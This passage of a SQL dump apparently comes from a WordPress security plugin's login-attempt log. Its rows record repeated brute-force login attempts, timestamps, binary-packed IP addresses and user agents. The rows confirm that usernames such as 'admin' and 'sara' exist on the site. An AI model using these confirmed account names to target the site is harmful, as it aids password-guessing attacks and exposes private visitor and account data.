Gecko'),(2181,8486,1697451325.551760,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2175,8208,1697344844.727623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0}','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2174,8171,1697331236.729838,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0b3','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2173,8087,1697302578.024806,1,'loginFailValidUsername','admin',1,'* #%\0sN','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2172,8086,1697302576.675642,1,'loginFailValidUsername','admin',1,'* #%\0sN','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2171,8064,1697299421.203325,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2170,8063,1697299419.565167,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2180,8485,1697451324.788082,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2179,8484,1697451323.959676,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2178,8483,1697451323.117703,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2177,8482,1697451321.938546,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2176,8480,1697449933.650646,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2200,8810,1697543700.812615,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0\'e','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(2199,8791,1697536367.048929,1,'loginFailValidUsername','admin',1,' A\0>\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(2198,8780,1697527862.759616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(2197,8769,1697523654.732500,1,'loginFailValidUsername','admin',1,'*\0\0\0\0\0\0l','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(2196,8680,1697505127.421344,1,'loginFailValidUsername','sara',2,'&\0w\0\0\0\0?#/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2195,8629,1697485590.934721,1,'loginFailValidUsername','admin',1,'*G\0Mc\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(2194,8628,1697484615.524503,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2193,8627,1697484614.075088,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2192,8559,1697478718.422789,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_Uu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2191,8558,1697478717.065715,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_Uu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2190,8542,1697477069.974311,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0xhx','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(2189,8535,1697474114.951800,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0#ڝ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(2328,13225,1699786526.649267,1,'loginFailValidUsername','admin',1,'&\0/\0\0\0\0\"','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(2319,12357,1699597447.580587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0HC\Z','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2318,12357,1699597447.567184,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0HC\Z','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2317,12298,1699584791.432369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0;}J','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2316,12297,1699584786.376725,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(2249,9794,1698164101.133826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0͹z','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53'),(2248,9792,1698161229.455840,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0hOr','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(2214,9048,1697644178.940310,1,'loginFailValidUsername','admin',1,'$Pc[;a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2215,9049,1697644181.183073,1,'loginFailValidUsername','admin',1,'$Pc[;a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2213,9040,1697632387.662198,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0l5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2212,9039,1697632385.962166,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0l5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2211,8863,1697569973.371188,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0M','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(2210,8852,1697562275.068945,1,'loginFailValidUsername','admin',1,'*$\Z\0*\0Ɋc)⟛','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2209,8851,1697562272.891696,1,'loginFailValidUsername','admin',1,'*$\Z\0*\0Ɋc)⟛','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2226,9259,1697808906.127345,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2225,9258,1697808903.901629,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2224,9256,1697807613.315863,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0k4','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53'),(2219,9061,1697652198.427278,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0J ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2218,9060,1697652196.901620,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0J ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2217,9052,1697646212.973850,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0l5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2216,9051,1697646211.243960,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0l5','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2223,9255,1697807529.652983,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0-=w','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(2221,9239,1697793245.459732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(2222,9250,1697804681.396074,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0э.','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2220,9190,1697784591.833193,1,'loginFailValidUsername','sara',2,'$\0a\0\0\0\0\0\0\0m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(2238,9614,1698044211.094395,1,'loginFailValidUsername','admin',1,' k\0}ў','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2239,9649,1698066765.682474,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),(2230,9288,1697851603.853764,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0-=','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),(2229,9285,1697848459.430328,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hK','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(2227,9276,1697830125.423567,1,'loginFailValidUsername','admin',1,' 6g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2256,9908,1698243087.362919,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0>g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2255,9906,1698241107.743261,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0>g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2254,9905,1698241106.138710,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0>g','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2253,9845,1698204031.241207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(2251,9809,1698172712.870488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2252,9810,1698172715.723067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2250,9797,1698165376.899281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0э8c','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(2265,10090,1698326930.519956,1,'loginFailInvalidUsername','wwwadmin',0,'\0\0\0\0\0\0\0\0\0\0/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2264,10090,1698326930.501732,1,'loginFailInvalidUsername','wwwadmin',0,'\0\0\0\0\0\0\0\0\0\0/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2263,10070,1698314262.874064,1,'loginFailValidUsername','admin',1,' A\'\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2262,10037,1698293109.228897,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0|jF','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(2260,9936,1698258531.073988,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0͹{:','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(2261,9936,1698258531.088509,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0͹{:','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(2259,9925,1698252839.081545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\^','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(2258,9925,1698252839.071024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\^','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(2278,10622,1698659449.158562,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2277,10621,1698659446.452674,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2276,10601,1698654369.736457,1,'loginFailValidUsername','admin',1,'  \0qV5 Pd','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2275,10572,1698641849.039496,1,'loginFailValidUsername','admin',1,'&\0`\0\0\0\0\0;','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2268,10141,1698390691.315775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z\'|','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(2267,10141,1698390691.299133,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z\'|','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(2266,10119,1698378284.746662,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0э8c','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2274,10563,1698630266.132708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\"A\0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(2270,10220,1698460875.077592,1,'loginFailValidUsername','admin',1,' A\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2269,10220,1698460875.065362,1,'loginFailValidUsername','admin',1,' A\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2273,10556,1698620098.913212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0xhx','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(2271,10494,1698558903.176255,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(2272,10553,1698617003.557907,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0pL','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2284,10755,1698838106.488126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k Q','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2283,10746,1698825899.401563,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0kS','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(2282,10740,1698821066.663599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0dG','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(2281,10716,1698794800.540518,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12'),(2279,10663,1698708501.427211,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Q˙','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(2280,10711,1698786452.647706,1,'loginFailValidUsername','admin',1,'$\0a\0\0\0\0\0\0\0m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(2296,11279,1699010957.849279,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%-','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(2290,11006,1698931770.838060,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(2289,10976,1698923750.068398,1,'loginFailInvalidUsername','Mini Gut Guru',0,'\0\0\0\0\0\0\0\0\0\04/','Mozilla/5.0'),(2288,10887,1698905820.316981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(2287,10804,1698882727.550000,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0k:','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2286,10775,1698861165.245623,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(2295,11151,1698967689.308362,1,'loginFailValidUsername','admin',1,'$\0\0830\06','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(2294,11148,1698966925.507072,1,'loginFailInvalidUsername','Mini Gut Guru',0,'\0\0\0\0\0\0\0\0\0\0h','Mozilla/5.0'),(2293,11147,1698966925.342283,1,'loginFailInvalidUsername','Biljana Toft',0,'\0\0\0\0\0\0\0\0\0\0h','Mozilla/5.0'),(2292,11146,1698966788.137871,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hL','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(2291,11143,1698966208.236181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k\\','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(2301,11384,1699079354.200646,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(2300,11369,1699068917.377375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0͹~*','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2299,11340,1699049074.566467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0(Iv','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(2298,11337,1699047466.603072,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(2297,11332,1699043706.078365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0濇','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(2311,12200,1699538468.174788,1,'loginFailValidUsername','admin',1,'*\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(2304,11591,1699169989.775688,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0/m{','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(2302,11552,1699133528.221498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0MM','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2303,11553,1699133529.734755,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0MM','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2310,12192,1699532396.940681,1,'loginFailInvalidUsername','wwwadmin',0,' A&\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(2307,12020,1699458902.675431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\07b','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(2305,11822,1699341029.494902,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2306,11923,1699381209.248017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hL','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2309,12192,1699532396.914279,1,'loginFailInvalidUsername','wwwadmin',0,' A&\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(2308,12177,1699528865.257771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0f','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(2315,12295,1699582556.481276,1,'loginFailValidUsername','admin',1,'$ z\0|;','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(2314,12295,1699582556.471510,1,'loginFailValidUsername','admin',1,'$ z\0|;','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(2313,12293,1699582225.277458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\v','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2312,12293,1699582225.267525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\v','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2327,13173,1699762524.234314,1,'loginFailValidUsername','admin',1,'&-\0\0\0\0\0\0\0L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(2326,13144,1699742091.725949,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36'),(2325,13143,1699742090.694232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36'),(2324,13142,1699742089.288116,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36'),(2323,13141,1699742087.377058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36'),(2322,13140,1699742086.026868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0zi','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 